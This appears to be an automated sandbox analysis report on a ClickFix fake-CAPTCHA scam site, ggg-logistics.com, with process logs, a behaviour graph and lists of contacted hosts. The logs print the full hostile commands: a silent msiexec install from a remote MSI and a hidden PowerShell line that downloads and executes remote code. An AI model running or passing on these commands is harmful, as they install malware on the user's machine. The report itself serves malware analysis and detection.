Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1702652 URL: https://ggg-logistics.com/ Startdate: 30/05/2025 Architecture: WINDOWS Score: 76 53 events-data-microsoft.live 2->53 55 dnsg-microsoftds-data.com 2->55 57 windows-msn-cn.org 2->57 71 Yara detected CAPTCHA Scam ClickFix 2->71 73 HTML page contains suspicious base64 encoded javascript 2->73 75 HTML page adds supicious text to clipboard 2->75 77 Sigma detected: PowerShell Base64 Encoded IEX Cmdlet 2->77 10 msiexec.exe 254 576 2->10         started        13 cmd.exe 1 2->13         started        15 chrome.exe 2 2->15         started        17 31 other processes 2->17 signatures3 process4 dnsIp5 63 dnsg-microsoftds-data.com 104.21.84.21, 443, 49716, 49718 CLOUDFLARENETUS United States 10->63 19 msiexec.exe 1 1 10->19         started        22 msiexec.exe 13->22         started        24 conhost.exe 13->24         started        65 192.168.2.5, 138, 443, 49485 unknown unknown 15->65 26 chrome.exe 15->26         started        29 chrome.exe 15->29         started        31 conhost.exe 17->31         started        33 conhost.exe 17->33         started        35 msiexec.exe 17->35         started        37 56 other processes 17->37 process6 dnsIp7 79 Suspicious powershell command line found 19->79 39 powershell.exe 19->39         started        67 www.google.com 142.251.186.103, 443, 49704 GOOGLEUS United States 26->67 69 ggg-logistics.com 162.254.39.23, 443, 49705, 49706 COGECO-PEER1CA United States 26->69 signatures8 process9 dnsIp10 59 events-data-microsoft.live 104.21.86.195, 49720, 80 CLOUDFLARENETUS United States 39->59 61 windows-msn-cn.org 104.21.69.237, 49724, 80 CLOUDFLARENETUS United States 39->61 51 C:\Users\...\dotnet-sdk-8.0.408-win-x64.exe, PE32 39->51 dropped 81 Powershell drops PE file 39->81 44 systeminfo.exe 39->44         started        47 conhost.exe 39->47         started        file11 signatures12 process13 signatures14 83 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 44->83 85 Writes or reads registry keys via WMI 44->85 49 WmiPrvSE.exe 44->49         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.84.21
 dnsg-microsoftds-data.com United States 13335 CLOUDFLARENETUS true
104.21.86.195
 events-data-microsoft.live United States 13335 CLOUDFLARENETUS true
162.254.39.23
 ggg-logistics.com United States 13768 COGECO-PEER1CA false
142.251.186.103
 www.google.com United States 15169 GOOGLEUS false
104.21.69.237
 windows-msn-cn.org United States 13335 CLOUDFLARENETUS false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
windows-msn-cn.org 104.21.69.237 true
events-data-microsoft.live 104.21.86.195 true
www.google.com 142.251.186.103 true
dnsg-microsoftds-data.com 104.21.84.21 true
ggg-logistics.com 162.254.39.23 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ggg-logistics.com/ true
    		unknown
    http://windows-msn-cn.org/5ktzQ4gu false
      		unknown
      http://c.pki.goog/r/r4.crl false
        		high
        http://events-data-microsoft.live/h8xiyPNTne false
          		unknown